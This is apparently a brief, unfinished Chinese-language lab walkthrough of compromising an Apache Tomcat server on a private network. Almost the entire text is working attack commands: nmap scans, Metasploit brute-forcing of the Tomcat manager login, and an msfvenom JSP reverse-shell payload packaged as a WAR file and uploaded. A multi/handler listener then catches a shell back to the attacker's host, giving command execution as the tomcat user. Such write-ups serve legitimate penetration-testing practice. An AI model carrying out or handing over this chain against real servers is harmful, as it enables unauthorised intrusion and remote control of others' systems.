Nmap -sS -Pn 192.168.232.0/24
nmap -v -A -sS -Pn -T4 -p 1-65535 192.168.232.132
扫页面
数据库部署成功后打开msf,利用这个模块:use auxiliary/scanner/http/tomcat_mgr_login
Show Options查看需要部署的选项
RHOSTS:目标机ip
THREAD:线程,设为5即可
BRUTEFORCE_SPEED:攻击速度
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.232.130 LPORT=10086 > shell.jsp
jar -cvf shell.war shell.jsp
在Tomcat里面上传此Shell
用MSF来监听
console
use exploit/multi/handler
set payload java/jsp_shell_reverse_tcp
set LHOST 192.168.232.130
set LPORT 10086
exploit
完成远程命令执行 权限为tomcat
接下来为提权(做完继续更= - = 目前刚做到这)